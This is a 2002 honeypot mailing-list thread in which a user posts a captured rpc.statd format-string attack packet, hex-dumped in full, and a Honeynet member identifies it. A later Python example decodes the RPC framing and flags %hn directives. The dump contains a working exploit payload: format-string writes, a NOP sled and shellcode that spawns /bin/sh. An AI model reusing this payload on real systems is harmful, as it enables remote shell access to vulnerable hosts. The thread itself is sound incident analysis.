Honeypots mailing list archives

Re: statd exploit ???
From: mike () honeynet org
Date: Wed, 30 Oct 2002 19:21:05 -0500 (EST)

Looks like a rpc.statd exploit, check securityfocus.com vuln db for it :)
Looks like it failed too.

Good luck

Mike
Honeynet Project Member

On Wed, 30 Oct 2002, Sriram Newsgroups wrote:


My honeypot recorded this packet. It looks to be a statd exploit (port
32768). I can't narrow it down to what exactly this exploit does or its nature.

Here is the sample packet

10/25-17:41:34.464523 24.123.46.10:847 -> x.x.x.linux:32768
UDP TTL:47 TOS:0x0 ID:51930 IpLen:20 DgmLen:1104
Len: 1084
51 1B 5D 1C 00 00 00 00 00 00 00 02 00 01 86 B8  Q.].............
00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20  ...............
3D B9 D6 3B 00 00 00 09 6C 6F 63 61 6C 68 6F 73  =..;....localhos
74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  t...............
00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF  ................
18 F7 FF BF 1A F7 FF BF 1A F7 FF BF 25 38 78 25  ............%8x%
38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38  8x%8x%8x%8x%8x%8
78 25 38 78 25 38 78 25 36 32 37 31 36 78 25 68  x%8x%8x%62716x%h
6E 25 35 31 38 35 39 78 25 68 6E 90 90 90 90 90  n%51859x%hn.....
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
-------------------------- Repeated 41 lines ---------------------
90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0  ..............1.
EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3  .|Y.A..A....A...
FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E  .....f.....Y..A.
99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66  ..A...I..A.....f
CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0  .....f....0..A..
66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0  f......1..?.....
3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7  ?.....?..../bin.
46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56  F./shA0..F..v..V
10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F  ..N.............
FF FF FF 00                                      ....


My honeypot replied with this

10/25-17:41:34.468306 x.x.x.linux:32768 -> 24.123.46.10:847
UDP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:60 DF
Len: 40
51 1B 5D 1C 00 00 00 01 00 00 00 00 00 00 00 00  Q.].............
00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 2F  .............../


Any ideas ????

Sriram
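
Added example, not part of the original posts: a Python decoder for the ONC RPC framing of the two datagrams quoted above, which also flags printf directives that write memory in the call's string argument. The byte strings are copied from the dumps in the message (the call is cut off before the 0x90 run); the function names and the regular expression are this example's own.

```python
import re
import struct

# Bytes copied from the two dumps quoted in the message. The call is cut off
# just before the 0x90 run, so its string argument is shorter than declared.
CALL = bytes.fromhex(
    "511B5D1C 00000000 00000002 000186B8 00000001 00000001 00000001 00000020"
    "3DB9D63B 00000009 6C6F6361 6C686F73 74000000 00000000 00000000 00000000"
    "00000000 00000000 000003E7 18F7FFBF 18F7FFBF 1AF7FFBF 1AF7FFBF 25387825"
    "38782538 78253878 25387825 38782538 78253878 25387825 36323731 36782568"
    "6E253531 38353978 25686E")
REPLY = bytes.fromhex(
    "511B5D1C 00000001 00000000 00000000 00000000 00000000 00000001 0000002F")

# printf conversions that store a count through a pointer (%n, %hn, %hhn, ...)
FMT_WRITE = re.compile(rb"%[0-9$]*(?:hh|h|ll|l)?n")

def pad4(n):
    """XDR pads opaque data and strings to a multiple of four bytes."""
    return (n + 3) // 4 * 4

def parse_call(pkt):
    """Decode an ONC RPC v2 call whose argument is a single XDR string."""
    xid, mtype, rpcvers, prog, vers, proc = struct.unpack_from(">6I", pkt, 0)
    if mtype != 0 or rpcvers != 2:
        raise ValueError("not an RPC version 2 call")
    off = 24
    for _ in range(2):  # credential, then verifier: flavor, length, body
        _flavor, length = struct.unpack_from(">2I", pkt, off)
        off += 8 + pad4(length)
    (declared,) = struct.unpack_from(">I", pkt, off)
    arg = pkt[off + 4:off + 4 + declared]  # shorter if the capture is truncated
    return {"xid": xid, "prog": prog, "vers": vers, "proc": proc,
            "declared_len": declared, "arg": arg,
            "fmt_writes": FMT_WRITE.findall(arg)}

def parse_reply(pkt):
    """Decode an accepted RPC reply carrying statd's sm_stat_res result."""
    xid, mtype, reply_stat = struct.unpack_from(">3I", pkt, 0)
    if mtype != 1 or reply_stat != 0:
        raise ValueError("not an accepted RPC reply")
    _flavor, vlen = struct.unpack_from(">2I", pkt, 12)
    accept_stat, res_stat, state = struct.unpack_from(">3I", pkt, 20 + pad4(vlen))
    return {"xid": xid, "accept_stat": accept_stat,
            "res_stat": res_stat, "state": state}

if __name__ == "__main__":
    call, reply = parse_call(CALL), parse_reply(REPLY)
    # 100024 is the RPC program number of the status monitor (statd);
    # procedure 1 is SM_STAT, which takes one string (mon_name).
    print("prog", call["prog"], "vers", call["vers"], "proc", call["proc"])
    print("string:", len(call["arg"]), "of", call["declared_len"], "bytes captured")
    print("write directives:", call["fmt_writes"])
    # res_stat 1 is stat_fail in sm_inter.x: an ordinary SM_STAT answer.
    print("reply matches call:", reply["xid"] == call["xid"], reply)
```

On these bytes the call decodes to program 100024, version 1, procedure 1 with two `%hn` directives in the string, and the reply is an accepted result with res_stat 1 and state 47.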



